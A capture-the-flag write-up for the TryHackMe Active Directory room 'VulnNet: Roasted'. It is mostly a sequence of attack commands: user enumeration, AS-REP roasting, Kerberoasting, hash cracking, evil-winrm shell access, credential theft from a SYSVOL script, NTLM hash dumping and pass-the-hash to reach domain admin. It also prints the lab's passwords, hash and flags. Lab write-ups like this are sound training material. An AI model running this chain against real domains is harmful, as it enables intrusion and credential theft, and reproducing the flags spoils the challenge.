// htb writeup TryHackMe 2026-02-25
VulnNet-Roasted
HackTheBox Easy TryHackMe
root obtained // PWNED

VulnNet: Roasted - TryHackMe

Platform: TryHackMe
Difficulty: Easy
IP Address: 10.201.79.171

Proof


🧭 Overview

VulnNet: Roasted is an Active Directory-themed Windows machine focused on enumeration, user hunting, AS-REP roasting, Kerberoasting, and privilege escalation through weak scripts. It demonstrates classic Windows network exploitation methodology, ending with full domain compromise.


🔍 Enumeration

🔎 Nmap

rustscan -a $target --ulimit 5000 -- -sC -sV -Pn -oN nmap_full

🔎 SMB Shares

smbclient -L \\$target\

Retrieved internal usernames:

Alexa Whitehat
Jack Goldenhand
Tony Skid
Johnny Leet

🚪 Exploitation

👥 Username Enumeration & AS-REP Roasting

git clone https://github.com/mohinparamasivam/AD-Username-Generator
python3 username-generate.py -u names.txt -o users.txt
kerbrute userenum users.txt --dc $target -d vulnnet-rst.local

Valid Users:

GetNPUsers -dc-ip $target -usersfile users.txt -outputfile hashes.txt

Found AS-REP hash for: t-skid

🔓 Password Cracking

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Password: tj072889*

✅ WinRM Access

crackmapexec winrm $target -u t-skid -p 'tj072889*'  # Fails

🔥 Kerberoasting

GetUserSPNs -dc-ip $target 'vulnnet-rst.local/t-skid:tj072889*' -request

Service User: enterprise-core-vn

john --wordlist=/usr/share/wordlists/rockyou.txt krbhash.txt

Password: ry=ibfkfv,s6h,

🦝 Evil-WinRM Shell

evil-winrm -u enterprise-core-vn -p 'ry=ibfkfv,s6h,' -i $target

User Flag: THM{726b7c0baaac1455d05c827b5561f4ed}


⬆️ Privilege Escalation

📁 SMB Script Disclosure

smbclient -U 'enterprise-core-vn' \\$target\SYSVOL
get vulnnet-rst.local/scripts/ResetPassword.vbs

Credentials found:

🧠 Domain Admin Access

crackmapexec winrm $target -u a-whitehat -p 'bNdKVkjv3RR9ht'  # Pwn3d!
impacket-wmiexec vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@$target

Confirmed: a-whitehat is a Domain Admin.

🧂 Dumping Hashes

impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@$target

🛡️ Administrator Shell

impacket-wmiexec vulnnet-rst.local/Administrator@$target -hashes :c2597747aa5e43022a3a3049a3c3b09d

Root Flag: THM{16f45e3934293a57645f8d7bf71d8d4c}


🧠 Lessons Learned